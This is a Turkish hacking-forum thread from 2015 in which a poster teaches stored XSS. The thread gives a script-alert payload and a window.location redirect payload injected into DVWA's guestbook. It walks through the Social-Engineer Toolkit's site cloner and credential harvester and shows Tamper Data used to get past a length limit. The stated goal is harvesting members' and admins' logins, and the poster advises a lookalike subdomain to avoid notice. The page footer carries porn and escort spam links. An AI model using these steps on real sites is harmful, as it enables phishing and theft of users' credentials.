KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
XSS Stored Açığı
Konu : XSS Stored Açığı - 26.08.2015, 01:46
Mesaj: #1
Merhabalar,
Eski ve basit olmasına karşın güçlü bir tehlike arz eden bir açık türümüz var; XSS
Ve XSS açığının veri tabanına işlenmesine olanak sağlayan açık türü ise: XSS StoredÖrneğin elimizde bir web sayfası var ve biz buraya gerekli javascript kodlarını enjekte ettiğimizde;
İmage

Bize çıktısı şu olacaktır;

İmage

Yaptığımız işlem gayet basit, ekrana alert mesajını verdirdik.

Kod:
[ltr][size=2]<script>alert("ExitStars Was Here");</script>
[/ltr]
[/size]

Bu gördüklerimiz basit bir XSS örneği idi. Bu kodlar veri tabanına kayıt olmaz, ancak XSS açığının bir türü var ki, eklenen kodlar veri tabanına kaydolur ve her girişimizde o kodlar çalışır. Buna XSS Stored denir. Basit bir yönlendirme kodu eklenerek site index sayfasına yönlendirilebilir. Ancak bizim amacımız siteyi index atıp hack etmek değil, üye ve yönetici bilgilerini almaksa eğer farklı bir yöntem izlenmelidir.
Diyelim ki bir ziyaretçi defterin de xss stored açığı var. Aynı zamanda bu web sayfasının bir üye/yönetici giriş ekranı var. O zaman bir senaryo oluşturalım.
- Yönetici / Üye giriş ekranı klonlanır.
- Açığın olduğu yere javascript yönlendirme kodu enjekte edilir.
- Yönlendirme klonlanmış giriş sayfasına yapılır.
- Sosyal Mühendislik yolu ile üyelerin yorum yapması istenilir
- Ve bilgiler bu yol ile elimize geçer.
Evet, yapacaklarımızın listesi hazır. Hemen operasyon aşamasına geçelim, ben örnek olarak ****sploitable kullanacağım. İçerisinde ki DVWA uygulamasında XSS Stored açığı mevcut.
Not: ****sploitable kullanacak arkadaşlar sisteme giriş yaptıktan sonra (Kullanıcı Adı: admin, Şifre: password) DVWA Security kısmından high (zor) seçeneğini low (kolay) olarak değiştirmelidirler. Yoksa kodlar çalışmayacaktır.
Gerekli Uygulamalar;
- Setoolkit
- Tamper Data
Hemen bir deneme yapıyoruz; 

İmage
İmage

Evet açık mevcut, demek ki buraya yönlendirme yapmak mümkün. O zaman bu scriptin giriş sayfasını klonlayalım. Bunun için setoolkit aracı biçilmiş kaftandır diyebiliriz. Kali linux üzerinde terminale setoolkit diyerek uygulamayı başlatabilirsiniz. Daha sonra sırası ile şu adımları izleyin


1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner


Bu adımları takip ettikten sonra bize IP Address for the POST back in Harvester/Tabnabbing: diye bir soru soracak. Bizden istediği klonlanacak sayfanın hangi siteye göre hazırlanacağı dır. Ben yerel sunucu üzerinde çalışacağım için kendi yerel ip adresimi yazacağım, siz dosyaları nereye yükleyecek iseniz (hangi adrese yönlendirecek iseniz) oranın ismini yazın.Daha sonra bizden Enter the url to clone: diyerek klonlanacak sayfayı isteyecektir. Açığın bulunduğu web sayfasında ki giriş panelinin ismini yazıyoruz.

İmage





Gördüğünüz gibi bize /var/www içerisine klonladığını söylüyor. Buradaki tüm dosyaları, hangi sayfaya yönlendirecek iseniz oraya aktarıyoruz. Benim ki yerel sunucu üzerinde, orada bırakıyorum. Şimdi sıra yönlendirme kodunu enjekte etmekte. Tekrar ziyaretçi defterine dönüyoruz.
Kodu eklerken ufak bir sıkıntı ile karşılaşıyoruz, karakter sınırlaması var. Tüm kodu ekleyemiyoruz.

Kod:
[ltr][size=2]<script>window.locati.on="http://yonendirilecekadres</script>
[/ltr]
[/size]



yonlendirilecek adres kısmına, klonlanmış scripti yüklediğimiz siteyi yazıyoruz.

İmage

Görüldüğü gibi kodun bir kısmı (</ dan sonrası) karakter sınırlaması nedeni ile yazılmıyor. O zaman biz de Tamper Data eklentisi ile yükleriz. Mozilla / araçlar sekmesinden Tamper Data’yı açıyoruz ve Start Tamper diyoruz. Hemen ardından Sign Guestbook butonuna tıklıyoruz. Gelen uyarıya tamper diyoruz ve ekranımız açılıyor.

İmage

mtxMessage kısmına kodlarımızın kalanını yazıyoruz. en son </ kısmını yazmıştık, devamı script> olmalı. > karakterinin kodlamada ki karşılığı > dir çünkü. Ok diyoruz ve kaydı onaylıyoruz. Sonuç olarak onaylanır onaylanmaz bizi giriş sayfasına yönlendirdi. Eğer url yapısına dikkat etmezse yine giriş yapması gerektiğini düşünüp giriş yapacaktır ve giriş bilgileri de, scriptin kurulu olduğu dizine kaydedilecektir. Benim localhost üzerinde kayıtlı olduğu için /var/www dizinini içerisinde bulunuyor. Giriş yapıp kontrol edelim.

İmage

Görüldüğü gibi, ben giriş yapınca bilgiler de scriptin kurulu olduğu dizinde ki bir txt belgesine eklenmiş oldu. Basit bir sosyal mühendislik, iyi bir taktik ile daha bir çok bilgiye erişilebilir. Setoolkit aracının hünerlerini ileri ki zamanlarda anlatmaya devam edeceğim, beklemede kalın.

Not: Örneğin http://exitstars.com/forum/login.php sayfası klonlanacak ise ve sizin elinizde bluedream.com adlı bir site varsa şöyle bir sub domain açabilirsiniz ve dosyaları oraya kopyalayabilirsiniz, daha az dikakt çekecektir.
http://exitstars.com.bluedream.com/forum/login.php
sizin için daha faydalı olucaktır.
Doğruların gözle görülmeyen orduları vardır.

WWW Alıntı ile Cevapla
Konu : XSS Stored Açığı - 26.08.2015, 02:01
Mesaj: #2
eline sağlık D

Alıntı ile Cevapla
Konu : XSS Stored Açığı - 26.08.2015, 02:18
Mesaj: #3
Ellerine sağlık , bir denk getirip alert ettiremedim şu xss yi : )

WWW Alıntı ile Cevapla
Konu : XSS Stored Açığı - 26.08.2015, 08:33
Mesaj: #4
bakalım sağ ol

WWW Alıntı ile Cevapla
Konu : XSS Stored Açığı - 26.08.2015, 11:27
Mesaj: #5
eyw tşk

WWW Alıntı ile Cevapla
Konu : XSS Stored Açığı - 26.08.2015, 21:39
Mesaj: #6
eline sağlık

WWW Alıntı ile Cevapla
Konu : XSS Stored Açığı - 30.08.2015, 19:22
Mesaj: #7
tşkler .

teşekkürler çok sağol

(Son Düzenleme: 30.08.2015, 19:23, Düzenleyen: aBdUlSiNs.)
WWW Alıntı ile Cevapla
Konu : XSS Stored Açığı - 20.09.2015, 02:28
Mesaj: #8
tşkrlr

WWW Alıntı ile Cevapla
Konu : XSS Stored Açığı - 28.10.2015, 16:31
Mesaj: #9
Nasıl yaapılıyor.

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno